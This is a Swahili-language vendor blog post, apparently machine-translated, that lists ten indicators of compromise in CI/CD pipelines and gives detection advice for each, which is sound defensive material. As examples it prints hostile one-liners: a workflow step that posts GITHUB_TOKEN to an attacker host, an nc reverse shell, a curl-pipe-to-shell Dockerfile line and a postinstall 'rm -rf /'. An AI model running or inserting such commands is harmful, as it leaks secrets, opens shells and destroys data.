Viashiria 10 Bora vya Maelewano katika CI/CD Pipelines

Utangulizi: Je, ni Viashiria Vipi vya Maelewano katika Usalama wa Mtandao?

Viashiria vya maelewano ni ishara za kwanza za onyo kwamba mfumo wako au pipeline inaweza kushambuliwa. Kwa maneno rahisi, viashiria vya maelewano ni alama zilizoachwa na washambuliaji, kama za ajabu logins, mabadiliko ya faili, au programu hasidi iliyofichwa. Katika Usalama wa mtandao wa IOC, hufanya kama alama za vidole kwenye eneo la uhalifu, na kukupa ushahidi dhahiri kwamba kuna kitu kibaya. Kwa hivyo, watengenezaji wanapouliza ni viashiria gani vya maelewano, jibu halikomei tu kwa seva au ngome za moto, pia linajumuisha hatari zilizofichwa katika kisasa CI/CD pipelines.

Katika haya pipelines, washambuliaji wanaweza kubadilisha msimbo, kuingiza utegemezi hasidi, au kubadilisha hatua za ujenzi bila kugunduliwa. Hata hivyo, miongozo mingi bado inazingatia seva au mitandao pekee. Kwa hivyo, mnyororo wa usambazaji wa programu umekuwa mojawapo ya shabaha rahisi zaidi.

Ndiyo maana kupata viashiria vya maelewano katika CI/CD pipelines ni muhimu. Zaidi ya yote, husaidia timu kuzuia programu hasidi, kulinda siri, na kulinda kila hatua ya uwasilishaji wa programu.

Viashiria 10 Bora vya Maelewano katika CI/CD Pipelines

Wakati wa kuelezea viashiria vya maelewano, orodha nyingi huzingatia seva au mitandao. Lakini katika CI/CD pipelines, washambuliaji huacha alama za vidole tofauti sana. Kutambua ishara hizi ni muhimu kwa ulinzi wa haraka. Hapa chini kuna alama 10 za usalama wa mtandao za IOC ambazo kila msanidi programu na mhandisi wa usalama anapaswa kuziangalia.

1. Mabadiliko ya Utegemezi Yanayotiliwa Mashaka

Moja ya viashiria vikuu vya maelewano katika pipelines ni sasisho la ghafla la utegemezi lisilo la kawaida. Washambuliaji mara nyingi hutumia nafasi ya wasanidi programu wa uaminifu katika wasimamizi wa vifurushi ili kuongeza vifurushi hatari.

Kwa mfano, katika npm a package.json diff inaweza kujumuisha ghafla:

+ "crypto-helper": "^1.0.2" 

Mabadiliko kama hayo yanaweza kuonekana kuwa salama lakini yanaweza kuingiza msimbo uliowekwa kwenye trojan katika kila muundo.

Athari: miundo iliyoathiriwa hurithi programu hasidi kwenye chanzo.

Ugunduzi: kutekeleza mapitio ya utegemezi, faili ya kufuli hubadilika, na kuchanganua vifurushi vipya kila wakati.

2. Msimbo Uliofichwa katika Miundo 

Waandishi wa programu hasidi hutegemea kuficha ili kuepuka mapitio. Kwa hivyo, kiashiria hiki cha maelewano katika CI/CD pipelines inaweza kuwa mojawapo ya magumu zaidi kukamata. Kwa kweli, mizigo iliyofichwa mara nyingi huingia kwenye maktaba huria au picha za vyombo bila taarifa.

Kwa mfano:

  • Kifurushi cha PyPI kinachotumia base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Picha ya Docker iliyojaa jozi za UPX zisizohitajika.
  • JavaScript imejaa \x41\x42 anatoroka kuwaficha wezi wa hati miliki.

Athari: Msimbo uliofichwa hutekelezwa kimya kimya wakati wa ujenzi au wakati wa utekelezaji, jambo ambalo hufanya hii kuwa ishara muhimu katika usalama wa mtandao wa IOC.
Ugunduzi: Kuchanganya SAST pamoja na uchanganuzi wa programu hasidi ili kuashiria msimbo uliosimbwa au uliopakiwa. Zaidi ya yote, chukulia ufichuzi kama alama nyekundu inayostahili uchunguzi zaidi.

3. Siri Zilizofichuliwa katika Git: Hatari ya Kawaida ya Usalama wa Mtandaoni ya IOC

CI/CD pipelinemara nyingi hurithi siri moja kwa moja kutoka kwenye hazina. Hata hivyo, wakati siri zinaonekana katika Git, huwa mojawapo ya majibu dhahiri kwa swali "viashiria vya maelewano ni vipi katika pipelines?” Mara tu vitambulisho vinapotua Git, washambuliaji wanaweza kuvitumia kwa muda usiojulikana.

Kwa mfano:

  • A .env faili iliyo na AWS_SECRET_KEY=.
  • Tokeni zimeingizwa config.json.
  • Siri bado zinaonekana katika historia ya Git hata baada ya kuondolewa.

Athari: Funguo zilizo wazi huwapa washambuliaji ufikiaji wa moja kwa moja kwenye CI/CD pipelines, mifumo ya wingu, au hifadhidata. Kwa hivyo hii ni mojawapo ya viashiria hatari zaidi vya maelewano.
Ugunduzi: Kutumia pre-commit hooks na kazi za CI kwa ajili ya kuchanganua kwa siri, na kufuta funguo zilizovuja mara moja. Zaidi ya hayo, tekeleza urekebishaji otomatiki ili kupunguza madirisha ya mfiduo.

4. Imevurugwa Pipeline Mipangilio: Viashiria Vilivyofichwa vya Maelewano

Pipeline configs ni malengo yenye thamani kubwa kwa sababu Marekebisho moja mara nyingi huharibu mtiririko mzima wa kaziKwa hivyo, imebadilishwa pipeline Faili ni hatari kubwa ya usalama wa mtandao ya IOC ambayo zana za ufuatiliaji wa jadi hugundua mara chache.

Kwa mfano:

  • Katika Vitendo vya GitHub:

- run: curl -X POST http://attacker[.]com --data $GITHUB_TOKEN
  • Katika GitLab: kazi hasidi imeongezwa kwenye .gitlab-ci.yml ambayo hutupa data nyeti.
  • Katika Jenkins: sh "nc -e /bin/bash attacker.com 4444".

Athari: Mabadiliko haya ambayo hayajaidhinishwa yanageuka kuwa pipeline kuingia kwenye mlango wa nyuma wa kudumu kwa washambuliaji, jambo ambalo ni wazi linahesabiwa kama kiashiria cha maelewano.
Ugunduzi: Tekeleza mipangilio iliyosainiwa, hitaji idhini za PR, na ufuatilie kazi zisizotarajiwa. Zaidi ya hayo, weka guardrails ambazo huzuia kiotomatiki mtiririko wa kazi uliobadilishwa.

5. Mwenye upendeleo IaC Makosa 

Ufafanuzi wa miundombinu usio sahihi mara nyingi huunda milango ya nyuma iliyofichwa. Kwa hivyo, chaguo-msingi zenye upendeleo katika IaC ni hatari ya kawaida ya usalama wa mtandao ya IOC.

Kwa mfano:

  • Maganda ya kutoa huduma ya kupelekwa kwa Kubernetes privileged: true.
  • Chati za usukani zinazoonyesha huduma zenye 0.0.0.0:22.

Athari: Washambuliaji hupata ufikiaji wa kiwango cha mizizi au hufichua huduma za ndani hadharani. Kwa hivyo, masuala haya hupanua eneo la mashambulizi kwa kiasi kikubwa.
Ugunduzi: Kuomba IaC kuchanganua ili kutekeleza upendeleo mdogo kabla ya kuunganisha. Zaidi ya hayo, hakikisha kila usanidi unapitiwa kama sehemu ya pipeline.

6. Tabia Zisizo za Kawaida za Kujenga 

Washambuliaji mara nyingi hubadilika pipeline tabia ya kuteleza katika vitendo viovu. Kwa maneno mengine, shughuli isiyo ya kawaida ya ujenzi ni mojawapo ya majibu wazi zaidi kwa viashiria vya maelewano katika CI/CD pipelines.

Kwa mfano:

  • Hutengeneza maombi ya mtandao wa nje kwa vikoa visivyojulikana.
  • Mradi wa Node.js ulizalisha PowerShell ghafla wakati wa npm install.
  • Kazi ya CI kupakua jozi kubwa ambazo hazijabainishwa katika hati za ujenzi.

Athari: Miundo iliyoathiriwa inaweza kutumika kama sehemu za usambazaji wa programu hasidi. Zaidi ya yote, husambaza mizigo mibaya katika kila usanidi.
Ugunduzi: Fuatilia kumbukumbu za ujenzi kwa michakato au miunganisho isiyotarajiwa. Zaidi ya hayo, sanidi ugunduzi usio wa kawaida ili kuashiria tabia zilizo nje ya kawaida.

7. Hati za Vifurushi Hasidi kama Hatari za Usalama wa Mtandaoni za IOC

Wasimamizi wa vifurushi huunga mkono mzunguko wa maisha hooks ambayo washambuliaji hutumia vibaya. Kwa hivyo, hati hasidi katika npm, PyPI, au Dockerfiles ni viashiria vikali vya maelewano.

Kwa mfano:

  • saa sita mchana: postinstall hati inayoendeshwa rm -rf / au kuashiria C2.
  • PyPI: setup.py kutekeleza msimbo wa Python uliofichwa kwenye usakinishaji.
  • Faili ya Docker: RUN curl attacker.sh | sh.

Athari: Shambulio hilo hutekelezwa wakati wa usakinishaji, kabla ya majaribio yoyote ya wakati wa utekelezaji. Kwa hivyo, watengenezaji huenda wasitambue hadi iwe kuchelewa sana.
Ugunduzi: Changanua maonyesho ya kifurushi kwa hati za kusakinisha. Zaidi ya hayo, punguza hatari hooks in CI/CD kazi za kupunguza mfiduo.

8. Viashiria vya Sumu ya Usajili vya Maelewano

Washambuliaji hubadilisha au kurekebisha mabaki katika sajili, na matukio haya ni mifano ya kiada ya viashiria vya maelewano katika mnyororo wa usambazaji. pipelines.

Kwa mfano:

  • Lebo ya picha ya Docker imesasishwa kimya kimya na safu iliyobadilishwa kuwa trojani.
  • Kifurushi cha ndani kilibadilishwa na toleo lenye sumu.
  • nafasi ya majina ya npm kuchuchumaa, kama vile lodash-proxy.

Athari: Kila ujenzi unaotumia kipengee cha sajili huathiriwa. Sio hivyo tu, bali maelewano huenea hadi huduma za chini.
Ugunduzi: Tekeleza ukaguzi wa saini na uadilifu kwenye mvuto wote wa sajili. Zaidi ya hayo, fuatilia asili ya mabaki ya bidhaa kwa kutumia SBOM uthibitisho.

9. Shughuli Isiyo ya Kawaida ya Mtumiaji kama Ushahidi wa IOC

Akaunti zilizoathiriwa karibu kila mara huacha alama zisizo za kawaida. Kwa hivyo, tabia isiyo ya kawaida ya msanidi programu ni kiashiria kikubwa cha maelewano.

Kwa mfano:

  • Commitimesukuma saa 3 asubuhi kwa saa za huko.
  • Idhini za PR kwa akaunti za likizo.
  • Pipelines husababishwa na masafa yasiyo ya kawaida.

Athari: Washambuliaji hutumia vibaya vitambulisho vilivyoibiwa ili kuingiza mabadiliko hasidi. Baada ya yote, bila ruhusa commits huchanganyika kwa urahisi na mifumo ya kawaida ya kazi.
Ugunduzi: Kufuatilia SCM shughuli za kutokuwepo kwa kasoro, kutekeleza MFA, na kuzungusha tokeni mara kwa mara. Zaidi ya hayo, tahadhari kuhusu commit au mifumo ya idhini.

10. Uadilifu Ulioshindwa au Ukaguzi wa Saini katika Usalama wa Mtandao wa IOC

Jambo la kawaida lakini lililopuuzwa kiashiria cha maelewano ni ukaguzi wa uadilifu au sahihi ulioshindwa. Katika usalama wa mtandao wa IOC, ukaguzi huu unathibitisha kwamba msimbo au mabaki ni halisi. Kuruka huondoka pipelineimefichuliwa.

Mifano:

  • Hashi ya SHA256 hailingani na checksum inayotarajiwa.
  • Saini ya GPG inayokosekana au batili.
  • An SBOM kuonyesha mabaki ambayo hayajasainiwa.

Athari: Kushindwa kwa uadilifu mara nyingi humaanisha kuchezewa, sumu ya usajili, au sindano ya programu hasidi.

Ugunduzi: Tengeneza ukaguzi wa sahihi kiotomatiki, tekeleza uthibitishaji wa checksum, na uzuie vipengele ambavyo havijasainiwa. Zaidi ya yote, chukulia kila ukaguzi ulioshindwa kama ushahidi dhahiri wa maelewano.

CI/CD Viashiria vya Maelewano kwa Muhtasari

Kiashiria cha Maelewano (IOC)Athari ndani CI/CD PipelinesJinsi ya Kugundua
Mabadiliko ya Utegemezi Yanayotiliwa MashakaWashambuliaji huingiza maktaba hasidi katika vidhibiti vya vifurushi, na kusababisha miundo iliyoathiriwa.Faili ya kufuli ya kufuatilia hutofautiana, hutekeleza ukaguzi wa utegemezi, na huchanganua utegemezi mfululizo.
Msimbo Uliofichwa katika MiundoMizigo iliyofichwa hutekelezwa wakati wa ujenzi au wakati wa utekelezaji bila kugunduliwa.Kutumia SAST na uchanganuzi wa programu hasidi ili kuashiria mifumo ya msimbo wa base64, hex, au pakiti.
Siri Zilizofichuliwa katika GitTokeni au funguo za API zilizovuja huwapa washambuliaji ufikiaji wa moja kwa moja kwa mifumo muhimu.Endesha skani za siri katika Git hooks na kufuta vitambulisho vilivyovuja kiotomatiki.
Imevurugwa Pipeline MipangilioMtiririko wa kazi uliorekebishwa huruhusu uchujaji wa data au uendelevu ndani CI/CD.Inahitaji idhini za PR, kutekeleza usanidi uliosainiwa, na kufuatilia pipeline Mabadiliko.
Bahati IaC MakosaMajukumu yanayoruhusu kupita kiasi au chaguo-msingi zisizo salama hufichua mazingira ya wingu.Changanua faili za Terraform, Kubernetes, na Helm kwa ajili ya utekelezaji mdogo wa haki.
Tabia Zisizo za Kawaida za KujengaPipelinehutumika kama sehemu za usambazaji wa programu hasidi au kwa ajili ya kusogea pembeni.Chambua kumbukumbu za ujenzi kwa ajili ya vipakuliwa, michakato, au simu zinazotoka bila kutarajiwa.
Hati za Vifurushi HasidiHati zilizofichwa za kabla/baada ya kusakinisha husababisha upakiaji wa malipo kabla ya majaribio ya wakati wa utekelezaji.Zuia hati hatari za npm/PyPI na uzuie utekelezaji katika CI/CD kazi.
Sumu ya UsajiliVitu vya kale vilivyotengenezwa kwa Trojan hubadilisha picha au mifumo ya jozi inayoaminika katika sajili.Thibitisha hesabu za hundi, tekeleza uthibitishaji wa sahihi, na uchanganue sajili kwa njia ya kiotomatiki.
Shughuli Isiyo ya Kawaida ya MtumiajiAkaunti zilizoathiriwa husababisha madhara commits au kichocheo pipelines.Kutekeleza MFA, kufuatilia commits kwa ajili ya anomalies, na uchanganue login chati.
Uhakiki wa Uadilifu au Saini UlioshindwaHuonyesha msimbo uliobadilishwa, utegemezi, au picha zinazoingia kwenye pipeline.Hundi za uadilifu kiotomatiki na uzuie vipengele ambavyo havijasainiwa au visivyolingana.

Kwa Nini Usalama wa Mtandaoni wa Jadi wa IOC Unakosekana CI/CD Hatari

Mashirika mengi tayari yanafuatilia viashiria vya maelewano kwenye seva, kompyuta, au mitandao. Hata hivyo, mbinu hii ya kawaida ya usalama wa mtandao wa IOC inapuuza CI/CD pipelines, ambazo sasa ni mojawapo ya nyuso muhimu zaidi za mashambulizi. Kwa kweli, pipelines huonyesha ishara za kipekee za maelewano ambazo zana za kitamaduni haziwezi kugundua.

Viashiria vya Maelewano katika Usalama wa Jadi

Katika usalama wa mtandao wa kawaida wa IOC, lengo kwa kawaida huwa ni:

  • kawaida logins au anwani za IP zinazopendekeza vitambulisho vilivyoibiwa.
  • Hash za faili zinazotiliwa shaka au mabadiliko ya usajili yanayoonyesha programu hasidi.
  • Trafiki isiyotarajiwa inayoelekeza kwenye uchujaji wa data.

Hizi ni viashiria vinavyojulikana pia vinavyofuatiliwa katika Mfumo wa MITER ATT&CK, ambayo huweka alama tabia na mbinu za kawaida za wapinzani. Hizi ni ishara muhimu. Hata hivyo, zinatumika hasa kwa mifumo ya uendeshaji au mitandao ya makampuni. Kwa hivyo, hukosa uingiliaji kati wa hila unaotokea mapema katika mnyororo wa usambazaji wa programu.

Kwa nini CI/CD Pipelines Ni Tofauti

CI/CD pipelines ni mazingira otomatiki ambapo watengenezaji commit msimbo, utegemezi wa kuvuta, na miundo ya kutolewa. Washambuliaji wanajua kwamba maelewano moja hapa huenea katika kila upelekaji. Kwa hivyo, ni vipi viashiria vya maelewano katika CI/CD pipelines? Zinaonekana tofauti sana:

  • Utegemezi hasidi ulioongezwa kimya kimya kwenye package.json au requirements.txt.
  • Funguo au tokeni za API zilizofichuliwa katika Git commitfaili za s au .env.
  • Msimbo uliofichwa ulioingizwa kwenye vifurushi vya npm au PyPI.
  • Faili za Terraform au Kubernetes zenye chaguo-msingi zisizo salama kama vile upendeleo: kweli.
  • Pipeline kazi zilizohaririwa ili kutoa data au kufungua milango ya nyuma.

Ishara hizi za maelewano katika CI/CD kubaki bila kuonekana standard zana za usalama.

Pengo katika Usalama wa Mtandao wa IOC

Ingawa timu nyingi zinaelewa thamani ya viashiria vya maelewano, bado hutegemea tu ugunduzi kutoka kwa seva na kumbukumbu za mtandao. Kwa hivyo, washambuliaji wanaweza sumu hujenga au kuingiza programu hasidi bila kuacha alama za kawaida. Hii ndiyo sababu matukio kama vile vifurushi vya XZ Utils vya mlango wa nyuma au vifurushi vya npm vibaya hayakugunduliwa hadi yalipofikia uzalishaji.

Aina hizi za maelewano ya mnyororo wa ugavi pia zinaangaziwa na CISMwongozo wa usalama wa mnyororo wa ugavi wa A, ambayo inaonya kwamba washambuliaji wanazidi kulenga CI/CD pipelines na sajili.

Takeaway

Usalama wa mtandao wa IOC wa jadi ni muhimu lakini hautoshi. Zaidi ya yote, timu lazima zitambue viashiria vya maelewano maalum kwa CI/CD pipelines. Hapo ndipo wanaweza kugundua msimbo hasidi au pipeline matumizi mabaya kabla hayajaenea katika mazingira.

zana-za-sca-za-uchambuzi-wa-muundo-wa-programu
Weka kipaumbele, rekebisha, na ulinde hatari za programu yako
Pata Akaunti yako ya Bure.
Hakuna kadi ya mkopo inayotakiwa.

Linda Uundaji na Uwasilishaji wa Programu yako

na Xygeni Product Suite